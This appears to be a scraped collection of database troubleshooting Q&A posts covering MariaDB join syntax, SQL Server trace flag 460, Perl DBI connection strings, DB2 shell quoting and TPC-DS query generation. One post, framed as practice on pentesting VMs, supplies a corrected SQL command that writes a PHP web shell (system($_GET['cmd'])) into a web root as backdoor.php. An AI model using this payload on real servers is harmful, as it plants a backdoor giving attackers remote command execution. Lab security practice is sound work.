I built the following Query, for MySQL, on Maria Db, phpMyAdmin Ver: 4.8.3
Database server
Server: 127.0.0.1 via TCP/IP
Server type: MariaDB
Server connection: SSL is not being used Documentation
Server version: 10.1.36-MariaDB - mariadb.org binary distribution
Protocol version: 10
Web server
Apache/2.4.34 (Win32) OpenSSL/1.1.0i PHP/7.2.10
Database client version: libmysql - mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
PHP extension: mysqliDocumentation curlDocumentation mbstringDocumentation
PHP version: 7.2.10
SQL
SELECT tblhoadon.MaHoaDon,
tblkhachhang.HoVaTen,
tblphongtro.MaSoPhong,
tblphongtro.GiaThue,
tbldichvu.MaDichVu,
tblchitietdv.TenChiPhi,
tblchitietdv.ThanhTien,
tblhoadon.TongTien
FROM tblhoadon,
tblphongtro,
tbldichvu,
tblchitietdv
WHERE tblhoadon.MaKhachHang = tblkhachhang.MaKhachHang,
tblhoadon.MaSoPhong = tblphongtro.MaSoPhong,
tblhoadon.MaDichVu = tbldichvu.MaDichVu,
tbldichvu.MaDichVu = tblchitietdv.MaDichVu LIKE 10040001
Report error
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use
near ' tblhoadon.MaSoPhong = tblphongtro.MaSoPhong, tblhoadon.MaDichVu
= tbldichvu.MaD' at line 1
Can you help me fix syntax error?
You can't just have a series of conditions. You need some logical operator between them, such as and or or.
Additionally, the last condition has several issues:
like` should take a string argument, not a number
You can't chain equalities like that, you should create two conditions with a logical and operator between them.
While it's not strictly wrong to use like without a wildcard, it's a bit pointless, and you can just use an = condition:
SELECT tblhoadon.MaHoaDon,
tblkhachhang.HoVaTen,
tblphongtro.MaSoPhong,
tblphongtro.GiaThue,
tbldichvu.MaDichVu,
tblchitietdv.TenChiPhi,
tblchitietdv.ThanhTien,
tblhoadon.TongTien
FROM tblhoadon,
tblphongtro,
tbldichvu,
tblchitietdv
WHERE tblhoadon.MaKhachHang = tblkhachhang.MaKhachHang AND
tblhoadon.MaSoPhong = tblphongtro.MaSoPhong AND
tblhoadon.MaDichVu = tbldichvu.MaDichVu AND
tbldichvu.MaDichVu = tblchitietdv.MaDichVu AND
tblchitiedv.MaDichVu = '10040001'
Related
I have a large insert query with ends in an error:
Msg 8152, Level 16, State 4, Line 1
String or binary data would be truncated
After some research I tried using TRACE FLAG 460, using the command below:
INSERT...
VALUES...
OPTION (QUERYTRACEON 460);
This gave the same error as before, so I tried to turn on the flag on server-level, using the command below:
DBCC TRACEON(460, -1);
Again, no change in the output. But when I check the flagstatus it gives all the right information:
DBCC TRACESTATUS(460);
TraceFlag Status Global Session
460 1 1 0
Does anyone have a clue how I can get Trace Flag 460 working? My server information is down below:
Edition: Developer Edition (64-bit)
ProductVersion: 14.0.2037.2
ResourceLastUpdateDateTime: 2020-11-02 21:20:26.783
ResourceVersion: 14.00.2037
BuildClrVersion: v4.0.30319
Have you checked the documentation??
It clearly says:
Note: This trace flag applies to SQL Server 2017 (14.x) CU12 and higher builds
Which means SQL Server 2017 has to have a build version number of 14.0.3045.24 or higher - which you don't seem to have.
So you'll need to install at least CU12 (or better yet: the latest CU22 - https://www.microsoft.com/en-us/download/details.aspx?id=56128) on your machine for this to work
See: SQL Server 2017 build versions - for all the details about the official version numbers of SQL Server 2017 (and it's various CU's)
I am trying to connect to SQL server using Perl DBI module, I have tried all the connection string format still Perl is throwing invalid connection string error.
I have already tried code snippet available on perl monk website.
#!/usr/bin/perl -w
use strict;
use DBI;
# Set up variables for the connection
my $server_name = '00.120.124.1;3181';
my $database_name = 'abcd';
my $database_user = 'kkkk';
my $database_pass = 'password';
my $DSN = 'driver={SQL Server};server=$server_name;da
+tabase=$database_name;uid=$database_user;pwd=$database_pass;';
my $dbh = DBI->connect("DBI:ODBC:$DSN") || die "Couldn't open database
+: $DBI::errstr\n";
Expected result is to connect to Database.
failed: [Microsoft][ODBC SQL Server Driver][DBNETLIB]SQL Server does not exist or access denied. [Microsoft][ODBC SQL Server Driver][DBNETLIB]ConnectionOpen (Connect()). (SQL-01000) [state was 01000 now 01S00] [Microsoft][ODBC SQL Server Driver]Invalid connection string attribute (SQL-01S00) at perl.pl line 16. Couldn't open database +: [Microsoft][ODBC SQL Server Driver][DBNETLIB]SQL Server does not exist or access denied. (SQL-08001) [state was 08001 now 01000] Invalid connection string attribute (SQL-01S00)
The lines of your post that begin with +
+tabase=$database_name;uid=$database_user;pwd=$database_pass;';
+: $DBI::errstr\n";
were incorrectly copied and pasted from perlmonks.org. The leading + sign is a convention that indicates a long line was split. You should delete the + and join the line to the previous line, so that your code will read
my $DSN = 'driver={SQL Server};server=$server_name;database=$database_name;uid=$database_user;pwd=$database_pass;';
my $dbh = DBI->connect("DBI:ODBC:$DSN") || die "Couldn't open database: $DBI::errstr\n";
Your error message contains the following:
SQL Server does not exist or access denied
Your set-up code contains the following:
my $server_name = '00.120.124.1;3181';
'00.120.124.1;3181' is not a valid server name or IP address. You should correct the IP address section (it can't start with '00') and remove the port into a separate parameter.
You also have the username and password as part of your DSN. I don't know if DBD::ODBC supports that usage (it's not mentioned in the documentation) but it's more traditional to have those as separate parameters to the connect() call.
All in all, I think you want something more like this:
my $server_name = '00.120.124.1'; # But this needs to be corrected
my $server_port = 3181;
my $database_name = 'abcd';
my $database_user = 'kkkk';
my $database_pass = 'password';
my $DSN = "driver={SQL Server};server=$server_name;port=$server_port;database=$database_name";
my $dbh = DBI->connect("DBI:ODBC:$DSN", $database_user, $database_pass)
|| die "Couldn't open database: $DBI::errstr\n";
Also note that I've changed the quote characters used to create your $DSN variable from single quotes to double quotes. Variables are not expanded in signel quotes, so you weren't getting the values of $server_name, etc. in your DSN.
The better way to connect is with the DBD::Sybase module. The name wouldn't suggest it but SQL Server takes its lineage from Sybase. That way you can avoid ODBC. http://metacpan.org/pod/DBD::Sybase#Using-DBD::Sybase-with-MS-SQL
I'm toying with some pentesting VMs, and I'm trying a shell upload in phpmyadmin.
The tutorial, I'm trying to follow is http://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
The question I have however is pure SQL - the command I'm trying to use:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
is producing the following error:
Error
There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem
ERROR: Unknown Punctuation String # 9
STR: <?
SQL: SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);
SQL query: Documentation
SELECT “<?php system($_GET[‘cmd’]);
MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?php system($_GET[‘cmd’])' at line 1
Any ideas how could I format it to be accepted?
The quotes were copied dirty. Replace them after pasting the snippet:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";
I'm currently using bash on CentOS. DB2 is installed and db2 is on my path.
I have a few lines in a script which are supposed to update my db2 database, but they aren't working. As a minimal reproduction, I can do the exact same thing right in the bash command line and get the same error. Here's that reproduction:
$ db2 connect to PLT02345 user uni using uni; db2 update USM_USER set STATUS = 1 where NAME = 'asm_admin'
I expect this to set STATUS to 1 for everything in PLT02345.USM_USER where the NAME is currently asm_admin.
Instead, I get an error about "ASM_ADMIN" not being valid in the context where it's used. Here's the full output:
Database Connection Information
Database server = DB2/LINUXX8664 10.1.2
SQL authorization ID = UNI
Local database alias = PLT02345
DB21034E The command was processed as an SQL statement because it was not a
valid Command Line Processor command. During SQL processing it returned:
SQL0206N "ASM_ADMIN" is not valid in the context where it is used.
SQLSTATE=42703
I'm confused - what about this makes it not valid? Is bash somehow mutilating the command and not passing everything as it should to db2?
If you're running this from the command line, Bash will drop the 's off 'asm_admin' because it simply assumes you're passing a string. The end result is the SQL becoming WHERE name = asm_admin which is invalid.
To correct this, you need to quote your whole command:
db2 "update USM_USER set STATUS = 1 where NAME = 'asm_admin'"
I have downloaded the DSGEN tool from the TPC-DS web site and already generated the tables and loaded the data into Oracle XE.
I am using the following command to generate the SQL statements :
dsqgen -input ..\query_templates\templates.lst -directory ..\query_templates -dialect oracle -scale 1
However, No matter how I adjust the command I always get this error message :
ERROR: A query template list must be supplied using the INPUT option
Can anybody help?
Apparently you need to use / rather than - for the flags for the Windows executable:
dsqgen /input ..\query_templates\templates.lst /directory ..\query_templates
/dialect oracle /scale 1